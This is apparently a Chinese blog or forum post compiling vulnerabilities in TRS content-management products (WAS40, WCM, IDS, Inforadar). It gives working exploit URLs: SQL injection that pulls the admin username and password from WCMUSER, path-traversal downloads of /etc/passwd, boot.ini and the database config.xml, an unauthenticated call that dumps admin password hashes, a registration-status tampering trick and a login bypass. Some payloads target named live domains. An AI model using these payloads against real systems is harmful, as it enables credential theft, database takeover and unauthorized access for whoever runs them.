TRS 漏洞整理

一、trs was40产品存在多个安全漏洞: 1.未授权访问 直接访问was40/tree可以看到一些后台功能 2.信息泄露 访问was40/passwd/passwd.htm 输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性。 3.未授权发布信息+xss 编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证 4. 部分用户系统存在system/manager 二、TRS某些版本WCM5.2~WCM6.5?存在SQL注入: 首先是这个页面,好像是越权了http://agent.trs.cn/portal/db/dbupdatelog_list.jsp 正常应该要登陆才能看吧?直接注入 [php]http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG[/php] 注:存在注入参数为:OrderType 和 OrderField 即把查询记录显示在结果里,要是没有记录,可以自己加一条 [php]http://agent.trs.cn/portal/db/dbupdatelog_addedit.jsp[/php] 另,源码在这里存在: [php]http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp[/php] 三、trs ids 系统存在任意文件读取和信息泄露漏洞: 具体文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等 四、trs某系统任意文件下载漏洞: exp [php]inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd[/php] exp2 [php]http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml[/php] 五、TRS WCM 6.x系列用户密码泄漏: TRS WCM 6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列。 访问链接:[php]HTTP://siteIP+port/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers[/php] WCM的密码加密方式是:常规32位 MD5 取前15位; 如果只访问wcm/infoview.do,尽管是个错误页面,比如: 首先访问[php]http://10.10.10.10:8080/wcm/infoview.do[/php] 然后你再访问:[php]http://10.10.10.10:8080/wcm[/php] (如果没有出现,那就多试几个,这个system可以忽略trs ids或ukey的。) 另外infoview.do本身就可以越权调用很多服务(serviceid)的(站点、文章、授权等)…… 六、TRS内容管理平台用户注册逻辑漏洞: 网址加上:[php]wcm/console/auth/reg_newuser.jsp[/php] [php]http://localhost:9999/wcm/console/auth/reg_newuser.jsp[/php] 即将随意表单改成 STATUS 值为 30,或增加STATUS字段表单。 然后提交注册 虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。 直接登陆 虽然没什么权限,但后台存在大量注入等漏洞 可以通过注入直接操作数据库了。 [php]http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx[/php] 直接下载数据库配置文件 七、TRS的WCM6漏洞权限绕过以及绕过密码的登陆方式: 首先访问wcm目录,会自动跳转到登录页面 在网址后加上查看管理员密码的链接:[php]wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin[/php] *之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题 这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了:

发表评论